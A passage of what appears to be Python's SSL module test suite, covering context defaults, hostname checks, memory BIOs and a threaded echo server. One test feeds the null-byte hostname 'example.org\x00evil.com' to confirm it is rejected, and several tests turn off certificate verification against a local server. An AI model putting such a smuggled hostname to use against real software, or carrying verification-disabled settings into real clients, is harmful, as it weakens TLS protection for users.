ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(
ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True
)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1_2)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
def test_num_tickest(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
self.server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.server_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=self.server_context)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
s = ctx.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME
)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_sni(self):
host, port = self.server_addr
server_names = []
# We store servername_cb arguments to make sure they match the host
def servername_cb(ssl_sock, server_name, initial_context):
server_names.append(server_name)
self.server_context.set_servername_callback(servername_cb)
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=SIGNING_CA)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
self.assertEqual(server_names, [host, host])
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
elif rc == errno.ENETUNREACH:
self.skipTest("Network unreachable.")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except (ConnectionResetError, ConnectionAbortedError):
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except ssl.SSLError as err:
# On Windows sometimes test_pha_required_nocert receives the
# PEER_DID_NOT_RETURN_A_CERTIFICATE exception
# before the 'tlsv13 alert certificate required' exception.
# If the server is stopped when PEER_DID_NOT_RETURN_A_CERTIFICATE
# is received test_pha_required_nocert fails with ConnectionResetError
# because the underlying socket is closed
if 'PEER_DID_NOT_RETURN_A_CERTIFICATE' == err.reason:
if self.server.chatty and support.verbose:
sys.stdout.write(err.args[1])
# test_pha_required_nocert is expecting this exception
raise ssl.SSLError('tlsv13 alert certificate required')
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
